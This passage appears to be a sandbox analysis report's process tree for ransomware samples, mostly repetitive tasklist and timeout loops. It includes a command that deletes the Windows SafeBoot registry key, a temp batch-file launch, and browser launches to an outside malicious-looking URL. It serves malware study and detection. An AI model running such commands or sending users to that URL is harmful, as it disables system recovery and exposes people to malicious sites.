                                                                                                                                                                                                                                                                                                                                                                                                        • Delays execution with timeout.exe
                                                                                                                                                                                                                                                                                                                                                                                                        PID:5444
                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                        C:\Windows\system32\cmd.exe /c tasklist|find /i "@[email protected]"
                                                                                                                                                                                                                                                                                                                                                                                                        7⤵
                                                                                                                                                                                                                                                                                                                                                                                                          PID:6924
                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\system32\tasklist.exe
                                                                                                                                                                                                                                                                                                                                                                                                            tasklist
                                                                                                                                                                                                                                                                                                                                                                                                            8⤵
                                                                                                                                                                                                                                                                                                                                                                                                            • Enumerates processes with tasklist
                                                                                                                                                                                                                                                                                                                                                                                                            PID:3000
                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\system32\timeout.exe
                                                                                                                                                                                                                                                                                                                                                                                                          timeout /t 3
                                                                                                                                                                                                                                                                                                                                                                                                          7⤵
                                                                                                                                                                                                                                                                                                                                                                                                          • Delays execution with timeout.exe
                                                                                                                                                                                                                                                                                                                                                                                                          PID:5352
                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                          C:\Windows\system32\cmd.exe /c tasklist|find /i "@[email protected]"
                                                                                                                                                                                                                                                                                                                                                                                                          7⤵
                                                                                                                                                                                                                                                                                                                                                                                                            PID:8660
                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\system32\tasklist.exe
                                                                                                                                                                                                                                                                                                                                                                                                              tasklist
                                                                                                                                                                                                                                                                                                                                                                                                              8⤵
                                                                                                                                                                                                                                                                                                                                                                                                              • Enumerates processes with tasklist
                                                                                                                                                                                                                                                                                                                                                                                                              PID:8184
                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\system32\timeout.exe
                                                                                                                                                                                                                                                                                                                                                                                                            timeout /t 3
                                                                                                                                                                                                                                                                                                                                                                                                            7⤵
                                                                                                                                                                                                                                                                                                                                                                                                            • Delays execution with timeout.exe
                                                                                                                                                                                                                                                                                                                                                                                                            PID:9232
                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                            C:\Windows\system32\cmd.exe /c tasklist|find /i "@[email protected]"
                                                                                                                                                                                                                                                                                                                                                                                                            7⤵
                                                                                                                                                                                                                                                                                                                                                                                                              PID:7332
                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\system32\tasklist.exe
                                                                                                                                                                                                                                                                                                                                                                                                                tasklist
                                                                                                                                                                                                                                                                                                                                                                                                                8⤵
                                                                                                                                                                                                                                                                                                                                                                                                                • Enumerates processes with tasklist
                                                                                                                                                                                                                                                                                                                                                                                                                PID:2380
                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\system32\timeout.exe
                                                                                                                                                                                                                                                                                                                                                                                                              timeout /t 3
                                                                                                                                                                                                                                                                                                                                                                                                              7⤵
                                                                                                                                                                                                                                                                                                                                                                                                              • Delays execution with timeout.exe
                                                                                                                                                                                                                                                                                                                                                                                                              PID:2764
                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                              C:\Windows\system32\cmd.exe /c tasklist|find /i "@[email protected]"
                                                                                                                                                                                                                                                                                                                                                                                                              7⤵
                                                                                                                                                                                                                                                                                                                                                                                                                PID:5964
                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\system32\tasklist.exe
                                                                                                                                                                                                                                                                                                                                                                                                                  tasklist
                                                                                                                                                                                                                                                                                                                                                                                                                  8⤵
                                                                                                                                                                                                                                                                                                                                                                                                                  • Enumerates processes with tasklist
                                                                                                                                                                                                                                                                                                                                                                                                                  PID:2760
                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\system32\timeout.exe
                                                                                                                                                                                                                                                                                                                                                                                                                timeout /t 3
                                                                                                                                                                                                                                                                                                                                                                                                                7⤵
                                                                                                                                                                                                                                                                                                                                                                                                                • Delays execution with timeout.exe
                                                                                                                                                                                                                                                                                                                                                                                                                PID:1584
                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                C:\Windows\system32\cmd.exe /c tasklist|find /i "@[email protected]"
                                                                                                                                                                                                                                                                                                                                                                                                                7⤵
                                                                                                                                                                                                                                                                                                                                                                                                                  PID:4220
                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\system32\tasklist.exe
                                                                                                                                                                                                                                                                                                                                                                                                                    tasklist
                                                                                                                                                                                                                                                                                                                                                                                                                    8⤵
                                                                                                                                                                                                                                                                                                                                                                                                                    • Enumerates processes with tasklist
                                                                                                                                                                                                                                                                                                                                                                                                                    PID:3280
                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\system32\timeout.exe
                                                                                                                                                                                                                                                                                                                                                                                                                  timeout /t 3
                                                                                                                                                                                                                                                                                                                                                                                                                  7⤵
                                                                                                                                                                                                                                                                                                                                                                                                                  • Delays execution with timeout.exe
                                                                                                                                                                                                                                                                                                                                                                                                                  PID:8360
                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                  C:\Windows\system32\cmd.exe /c tasklist|find /i "@[email protected]"
                                                                                                                                                                                                                                                                                                                                                                                                                  7⤵
                                                                                                                                                                                                                                                                                                                                                                                                                    PID:9648
                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\system32\tasklist.exe
                                                                                                                                                                                                                                                                                                                                                                                                                      tasklist
                                                                                                                                                                                                                                                                                                                                                                                                                      8⤵
                                                                                                                                                                                                                                                                                                                                                                                                                      • Enumerates processes with tasklist
                                                                                                                                                                                                                                                                                                                                                                                                                      PID:1792
                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\system32\timeout.exe
                                                                                                                                                                                                                                                                                                                                                                                                                    timeout /t 3
                                                                                                                                                                                                                                                                                                                                                                                                                    7⤵
                                                                                                                                                                                                                                                                                                                                                                                                                    • Delays execution with timeout.exe
                                                                                                                                                                                                                                                                                                                                                                                                                    PID:2344
                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                    C:\Windows\system32\cmd.exe /c tasklist|find /i "@[email protected]"
                                                                                                                                                                                                                                                                                                                                                                                                                    7⤵
                                                                                                                                                                                                                                                                                                                                                                                                                      PID:3840
                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\system32\tasklist.exe
                                                                                                                                                                                                                                                                                                                                                                                                                        tasklist
                                                                                                                                                                                                                                                                                                                                                                                                                        8⤵
                                                                                                                                                                                                                                                                                                                                                                                                                        • Enumerates processes with tasklist
                                                                                                                                                                                                                                                                                                                                                                                                                        PID:7008
                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\system32\timeout.exe
                                                                                                                                                                                                                                                                                                                                                                                                                      timeout /t 3
                                                                                                                                                                                                                                                                                                                                                                                                                      7⤵
                                                                                                                                                                                                                                                                                                                                                                                                                      • Delays execution with timeout.exe
                                                                                                                                                                                                                                                                                                                                                                                                                      PID:7700
                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                      C:\Windows\system32\cmd.exe /c tasklist|find /i "@[email protected]"
                                                                                                                                                                                                                                                                                                                                                                                                                      7⤵
                                                                                                                                                                                                                                                                                                                                                                                                                        PID:7100
                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\system32\tasklist.exe
                                                                                                                                                                                                                                                                                                                                                                                                                          tasklist
                                                                                                                                                                                                                                                                                                                                                                                                                          8⤵
                                                                                                                                                                                                                                                                                                                                                                                                                          • Enumerates processes with tasklist
                                                                                                                                                                                                                                                                                                                                                                                                                          PID:7620
                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\system32\timeout.exe
                                                                                                                                                                                                                                                                                                                                                                                                                        timeout /t 3
                                                                                                                                                                                                                                                                                                                                                                                                                        7⤵
                                                                                                                                                                                                                                                                                                                                                                                                                        • Delays execution with timeout.exe
                                                                                                                                                                                                                                                                                                                                                                                                                        PID:684
                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                        C:\Windows\system32\cmd.exe /c tasklist|find /i "@[email protected]"
                                                                                                                                                                                                                                                                                                                                                                                                                        7⤵
                                                                                                                                                                                                                                                                                                                                                                                                                          PID:9120
                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\Desktop\00450\Trojan-Ransom.Win32.Encoder.ncc-aaccb208c97c30e487589faa4e32b5178c10c732ca17dc14c57c43312f8e3831.exe
                                                                                                                                                                                                                                                                                                                                                                                                                  Trojan-Ransom.Win32.Encoder.ncc-aaccb208c97c30e487589faa4e32b5178c10c732ca17dc14c57c43312f8e3831.exe
                                                                                                                                                                                                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                    PID:9020
                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\Desktop\00450\Trojan-Ransom.Win32.GenericCryptor.cys-b059843eba05481808a1fe0f315d5d90f6280ed1d9c2ca23248bd5b502a87e9b.exe
                                                                                                                                                                                                                                                                                                                                                                                                                    Trojan-Ransom.Win32.GenericCryptor.cys-b059843eba05481808a1fe0f315d5d90f6280ed1d9c2ca23248bd5b502a87e9b.exe
                                                                                                                                                                                                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                      PID:8016
                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\qoiss.exe
                                                                                                                                                                                                                                                                                                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\qoiss.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                        4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                          PID:8276
                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                          C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\_uinsey.bat" "
                                                                                                                                                                                                                                                                                                                                                                                                                          4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                            PID:4572
                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\Desktop\00450\Trojan-Ransom.Win32.Mbro.bcfn-23cb967e1c525f359e50a52dbecef86ca87ac8d33192c7a314011511bb2a681b.exe
                                                                                                                                                                                                                                                                                                                                                                                                                          Trojan-Ransom.Win32.Mbro.bcfn-23cb967e1c525f359e50a52dbecef86ca87ac8d33192c7a314011511bb2a681b.exe
                                                                                                                                                                                                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                            PID:5532
                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\REG.exe
                                                                                                                                                                                                                                                                                                                                                                                                                              REG DELETE HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\ /va /f
                                                                                                                                                                                                                                                                                                                                                                                                                              4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                              • Modifies registry key
                                                                                                                                                                                                                                                                                                                                                                                                                              PID:3596
                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                                                                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://www.gys47.pw/hot/70ef/?uid=
                                                                                                                                                                                                                                                                                                                                                                                                                              4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                PID:10164
                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ffe585346f8,0x7ffe58534708,0x7ffe58534718
                                                                                                                                                                                                                                                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:6708
                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://www.gys47.pw/hot/70ef/?uid=
                                                                                                                                                                                                                                                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:8400
                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffe585346f8,0x7ffe58534708,0x7ffe58534718
                                                                                                                                                                                                                                                                                                                                                                                                                                      5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:9160
                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://www.gys47.pw/hot/70ef/?uid=
                                                                                                                                                                                                                                                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:9904
                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffe585346f8,0x7ffe58534708,0x7ffe58534718
                                                                                                                                                                                                                                                                                                                                                                                                                                          5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:8996
                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://www.gys47.pw/hot/70ef/?uid=
                                                                                                                                                                                                                                                                                                                                                                                                                                          4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:4628
                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffe585346f8,0x7ffe58534708,0x7ffe58534718
                                                                                                                                                                                                                                                                                                                                                                                                                                              5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:7832
                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://www.gys47.pw/hot/70ef/?uid=
                                                                                                                                                                                                                                                                                                                                                                                                                                              4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:8628
                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffe585346f8,0x7ffe58534708,0x7ffe58534718
                                                                                                                                                                                                                                                                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:6200
                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://www.gys47.pw/hot/70ef/?uid=
                                                                                                                                                                                                                                                                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:7128
                                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x108,0x10c,0x110,0xd8,0xdc,0x7ffe585346f8,0x7ffe58534708,0x7ffe58534718
                                                                                                                                                                                                                                                                                                                                                                                                                                                      5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:4912
                                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://www.gys47.pw/hot/70ef/?uid=
                                                                                                                                                                                                                                                                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:8260
                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffe585346f8,0x7ffe58534708,0x7ffe58534718
                                                                                                                                                                                                                                                                                                                                                                                                                                                          5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:7252
                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://www.gys47.pw/hot/70ef/?uid=
                                                                                                                                                                                                                                                                                                                                                                                                                                                          4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:7792
                                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffe585346f8,0x7ffe58534708,0x7ffe58534718
                                                                                                                                                                                                                                                                                                                                                                                                                                                              5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:7204
                                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://www.gys47.pw/hot/70ef/?uid=
                                                                                                                                                                                                                                                                                                                                                                                                                                                              4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:3924
                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffe585346f8,0x7ffe58534708,0x7ffe58534718
                                                                                                                                                                                                                                                                                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:10004
                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://www.gys47.pw/hot/70ef/?uid=
                                                                                                                                                                                                                                                                                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:732
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffe585346f8,0x7ffe58534708,0x7ffe58534718
                                                                                                                                                                                                                                                                                                                                                                                                                                                                      5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:3248
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://www.gys47.pw/hot/70ef/?uid=
                                                                                                                                                                                                                                                                                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:6000
                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffe585346f8,0x7ffe58534708,0x7ffe58534718
                                                                                                                                                                                                                                                                                                                                                                                                                                                                          5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:3564
                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://www.gys47.pw/hot/70ef/?uid=
                                                                                                                                                                                                                                                                                                                                                                                                                                                                          4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:620
                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffe585346f8,0x7ffe58534708,0x7ffe58534718
                                                                                                                                                                                                                                                                                                                                                                                                                                                                              5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:6036
                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
